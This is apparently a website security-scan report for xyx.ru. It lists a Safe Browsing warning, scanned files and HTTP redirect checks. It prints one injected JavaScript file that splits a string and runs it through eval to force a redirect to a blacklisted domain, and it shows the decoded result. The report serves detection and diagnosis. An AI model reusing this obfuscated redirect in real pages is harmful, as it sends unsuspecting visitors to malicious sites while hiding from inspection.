Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xyx.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://xyx.ru/ | 200 OK Content-Length: 223 Content-Type: text/html | clean |
http://xyx.ru/=.js | 200 OK Content-Length: 190 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: cerdit.ru var str1 = "locat"; var str2 = "ion.repl"; var str3 = "ace('http:/"; var str4 = "/cer"; var str5 = "dit.r"; var str6 = "u/"; var str7 = "')"; eval(str1+str2+str3+str4+str5+str6+str7); Decoded script: location.replace('http://cerdit.ru/') location.replace('http://cerdit.ru/') | ||
http://xyx.ru/test404page.js | 404 Not Found Content-Length: 1411 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: xyx.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 24 Jan 2015 04:20:40 GMT
Server: nginx/1.6.2
Content-Type: text/html; charset=windows-1251
GET / HTTP/1.1
Host: xyx.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 24 Jan 2015 04:20:40 GMT
Server: nginx/1.6.2
Content-Type: text/html; charset=windows-1251
Second query (visit from search engine):
GET / HTTP/1.1
Host: xyx.ru
Referer: http://www.google.com/search?q=xyx.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: xyx.ru
Referer: http://www.google.com/search?q=xyx.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.